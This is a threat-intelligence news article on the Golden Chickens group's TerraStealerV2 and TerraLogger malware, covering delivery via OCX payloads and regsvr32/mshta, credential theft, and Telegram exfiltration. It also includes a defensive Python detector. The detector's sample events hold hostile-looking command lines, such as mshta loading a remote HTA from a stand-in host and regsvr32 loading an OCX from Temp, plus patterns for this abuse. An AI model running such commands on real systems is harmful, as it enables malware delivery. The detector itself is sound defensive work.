
Golden Chickens, a persistent cybercriminal group also known as Venom Spider, has re-emerged with two newly identified malware strains: TerraStealerV2 and TerraLogger. These additions to their ever-evolving arsenal highlight the group’s ongoing efforts to refine its tactics and expand its malware-as-a-service (MaaS) offerings.
These developments, reported by the Recorded Future Insikt Group, demonstrate that Golden Chickens remains highly active, even as the broader cybersecurity landscape sees the rise of similarly dangerous threats like Hannibal Stealer, Nullpoint Stealer, and the upgraded StealC V2 malware.
TerraStealerV2 and TerraLogger: What We Know
TerraStealerV2 is engineered for comprehensive data harvesting, targeting sensitive browser information, including:
Login credentials from Chrome’s Login Data database
Cryptocurrency wallet data
Information from browser extensions
The malware is deployed using a variety of file types, including EXEs, DLLs, MSI installers, and LNK shortcuts. A notable characteristic is its use of OCX payloads fetched from the suspicious domain wetransfers[.]io. Once installed, the malware uses trusted Windows tools like regsvr32.exe and mshta.exe to sidestep detection by antivirus systems.
However, there’s a technical shortcoming in TerraStealerV2: it fails to bypass Application Bound Encryption (ABE) in newer versions of Chrome, a sign that the malware may still be under development or simply lagging behind browser security updates.
Captured data is transmitted both to Telegram channels and to the aforementioned domain, indicating the use of redundant exfiltration channels so that stolen data still reaches the operators even if one channel is blocked.
On the other hand, TerraLogger serves as a standalone keylogger. It captures keystrokes using a low-level keyboard hook and writes them to local storage. Unlike its counterpart, it lacks a built-in data exfiltration mechanism or command-and-control communication, suggesting it’s either a component of a larger malware suite or still in early development stages.
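As an added defender-side example (not code from the original report, Recorded Future, or any vendor), the following Python detector runs the regsvr32.exe / mshta.exe living-off-the-land pattern described above over constructed Sysmon-style process-creation events: it flags regsvr32 loading a module from a URL or a user-writable directory and mshta launching remote or inline content, while leaving a vendor install under Program Files alone. The event fields, the filehost.example domain and the rule names are assumptions made for this example.

```python
import re

# Constructed Sysmon-style process-creation events (Event ID 1 fields, simplified).
# These are illustrative samples written for this example, not captured telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\regsvr32.exe",          # benign vendor install
     "CommandLine": r'regsvr32.exe /s "C:\Program Files\Vendor\ctl.ocx"'},
    {"Image": r"C:\Windows\System32\regsvr32.exe",          # OCX dropped in user Temp
     "CommandLine": r"regsvr32.exe /s /n /i:C:\Users\bob\AppData\Local\Temp\upd.ocx"},
    {"Image": r"C:\Windows\System32\mshta.exe",             # remote HTA (assumed domain)
     "CommandLine": r"mshta.exe https://filehost.example/inv.hta"},
    {"Image": r"C:\Windows\System32\mshta.exe",             # benign local help file
     "CommandLine": r'mshta.exe "C:\Program Files\Vendor\help.hta"'},
]

# Directories an unprivileged user can write to; a module loaded from here is suspicious.
USER_WRITABLE = re.compile(
    r"(?i)\\(Users\\[^\\]+\\(AppData|Downloads|Desktop)|ProgramData|Windows\\Temp|Temp)\\")
URL = re.compile(r"(?i)\bhttps?://")
SCRIPT_PROTO = re.compile(r"(?i)\b(javascript|vbscript):")


def classify(event):
    """Return the list of rule names that fire on one process-creation event."""
    image = event["Image"].lower().rsplit("\\", 1)[-1]
    cmd = event["CommandLine"]
    hits = []
    if image == "regsvr32.exe":
        if URL.search(cmd):                       # scriptlet or module fetched over HTTP(S)
            hits.append("regsvr32_remote_scriptlet")
        if USER_WRITABLE.search(cmd) and re.search(r"(?i)\.(ocx|dll)\b", cmd):
            hits.append("regsvr32_user_writable_module")
    elif image == "mshta.exe":
        if URL.search(cmd) or SCRIPT_PROTO.search(cmd):   # remote HTA or inline script
            hits.append("mshta_remote_or_inline")
        elif USER_WRITABLE.search(cmd):
            hits.append("mshta_user_writable_hta")
    return hits


def analyze(events):
    """Run every event through classify() and return only the ones that fired."""
    return [{"CommandLine": e["CommandLine"], "rules": classify(e)}
            for e in events if classify(e)]


if __name__ == "__main__":
    for finding in analyze(SAMPLE_EVENTS):
        print(finding)
```

In production the same logic would sit in a SIEM rule keyed on the Image and CommandLine fields; the benign baselines show why the path check, not the binary name alone, carries the signal.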
The Golden Chickens Profile
Golden Chickens has operated since at least 2018 and is notorious for its sophisticated malware toolkit. The threat group is known for:
Offering malware under a MaaS model
Developing payloads like More_eggs, VenomLNK, TerraLoader, and TerraCrypt
Operating under the online alias badbullzvenom, reportedly tied to actors in Canada and Romania
Their previously documented malware, such as RevC2 and Venom Loader, demonstrates a consistent focus on credential theft and access facilitation.
The new tools appear to be an extension of these objectives, albeit still in the refinement phase, especially in comparison to more polished Golden Chickens threats of the past.
Rise of Competitors in the Stealer Ecosystem
The cybercrime market is witnessing rapid evolution. Malware such as Hannibal Stealer, Gremlin Stealer, and Nullpoint Stealer are designed to compete in the same territory as TerraStealerV2 by offering similar data-harvesting capabilities.
Of particular note is StealC V2, released in March 2025, which boasts:
Improved payload delivery via MSI and PowerShell
A redesigned, interactive control panel
RC4 encryption for secure C2 communication
Telegram bot integration for real-time notifications
New features like geolocation-based rules, HWID targeting, and server-side brute-force mechanisms
These enhancements reflect the level of sophistication now expected in modern malware, something TerraStealerV2 and TerraLogger are seemingly working toward but have not yet achieved.
What Undercode Says:
While TerraStealerV2 and TerraLogger are not yet fully matured, their structure indicates a modular design philosophy. Golden Chickens appears to be investing in interoperability across their suite, likely aiming to position themselves for seamless tool integration — a hallmark of advanced persistent threats (APTs).
Analytically speaking, the reliance on OCX files and trusted Windows utilities shows a tactical pivot toward fileless and native execution, mimicking legitimate behavior to avoid detection. However, failure to bypass Chrome’s post-July 2024 ABE shows they are still catching up on defensive advancements.
The exfiltration via Telegram raises questions about operational security. Telegram offers encryption but is not bulletproof. This choice likely reflects a blend of convenience and flexibility rather than strong OPSEC — suggesting these tools are either designed for fast campaigns or lower-tier customers on their MaaS platform.
From a broader threat intelligence standpoint, Golden Chickens is playing catch-up in a market where malware is becoming hyper-specialized. The success of StealC V2, with its streamlined C2 and enhanced payload logic, sets a high bar.
In contrast, TerraLogger’s lack of C2 infrastructure feels more like a prototype than a weaponized product. Its utility could be maximized when deployed alongside more developed malware (e.g., a loader or stealer), or as a plug-in for more targeted campaigns requiring keystroke monitoring rather than bulk credential dumps.
What also stands out is the repeated use of compromised or pseudo-legitimate file-sharing domains like wetransfers[.]io. These choices offer attackers better camouflage in email campaigns or drive-by download scenarios. It’s likely a strategic attempt to bypass URL blacklists and evade automated scanning systems.
In conclusion, Golden Chickens’ toolkit is growing again, but their latest releases suggest a transitional phase. While their infrastructure and naming convention remain consistent, the tools themselves do not yet exhibit the hallmarks of mature deployment — a gap that may close rapidly as the group iterates.
Fact Checker Results:
OCX Payloads: Confirmed delivery method for both malware variants
Telegram Exfiltration: Verified tactic in recent malware analysis
Chrome ABE Limitation: Valid technical observation; post-July 2024 Chrome update complicates data theft
Prediction:
Golden Chickens is likely to release enhanced versions of both TerraStealerV2 and TerraLogger within the next 3–6 months. These will likely include:
Improved Chrome decryption modules
Full C2 integration for TerraLogger
More robust encryption for exfiltrated data
Payload customization through builder GUIs similar to StealC V2
The group will probably continue investing in MaaS adaptability, streamlining their malware suite to serve both elite threat actors and script kiddies alike. As threat competition intensifies, expect increased convergence of stealer, loader, and keylogger functionalities in Golden Chickens’ future releases.
References:
Reported By: thehackernews.com